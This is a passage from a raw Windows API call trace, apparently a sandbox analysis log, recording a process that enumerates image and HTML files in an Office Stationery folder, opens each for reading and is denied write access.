(HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.281] AreFileApisANSI () returned 1 [0102.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg", lpUsedDefaultChar=0x0) returned 76 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0102.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.281] AreFileApisANSI () returned 1 [0102.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0102.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85440 [0102.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg") returned 76 [0102.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.282] GetFileType (hFile=0x27c) returned 0x1 [0102.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0102.282] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.282] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.282] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.282] CloseHandle (hObject=0x27c) returned 1 [0102.283] AreFileApisANSI () returned 1 [0102.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0102.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85b20 [0102.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg") returned 76 [0102.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.283] GetLastError () returned 0x5 [0102.283] GetLastError () returned 0x5 [0102.283] SetLastError (dwErrCode=0x5) [0102.283] GetLastError () returned 0x5 [0102.283] SetLastError (dwErrCode=0x5) [0102.283] GetLastError () returned 0x5 [0102.283] SetLastError (dwErrCode=0x5) [0102.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0102.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0102.283] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.283] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.283] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0102.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0102.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.284] AreFileApisANSI () returned 1 [0102.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm", lpUsedDefaultChar=0x0) returned 70 [0102.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.284] AreFileApisANSI () returned 1 [0102.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 70 [0102.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.285] GetFileType (hFile=0x27c) returned 0x1 [0102.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0102.285] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.285] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.285] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.285] CloseHandle (hObject=0x27c) returned 1 [0102.444] AreFileApisANSI () returned 1 [0102.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ae18 [0102.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 70 [0102.444] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.444] GetLastError () returned 0x5 [0102.444] GetLastError () returned 0x5 [0102.444] SetLastError (dwErrCode=0x5) [0102.444] GetLastError () returned 0x5 [0102.444] SetLastError (dwErrCode=0x5) [0102.444] GetLastError () returned 0x5 [0102.444] SetLastError (dwErrCode=0x5) [0102.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0102.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.445] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0102.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0102.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.446] AreFileApisANSI () returned 1 [0102.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg", lpUsedDefaultChar=0x0) returned 70 [0102.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0102.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.446] AreFileApisANSI () returned 1 [0102.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8b078 [0102.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg") returned 70 [0102.446] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.447] GetFileType (hFile=0x27c) returned 0x1 [0102.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.447] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.447] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.448] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.448] CloseHandle (hObject=0x27c) returned 1 [0102.448] AreFileApisANSI () returned 1 [0102.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a530 [0102.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg") returned 70 [0102.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.449] GetLastError () returned 0x5 [0102.449] GetLastError () returned 0x5 [0102.449] SetLastError (dwErrCode=0x5) [0102.449] GetLastError () returned 0x5 [0102.449] SetLastError (dwErrCode=0x5) [0102.449] GetLastError () returned 0x5 [0102.449] SetLastError (dwErrCode=0x5) [0102.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0102.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.449] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96dccc65, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0102.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.450] AreFileApisANSI () returned 1 [0102.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft 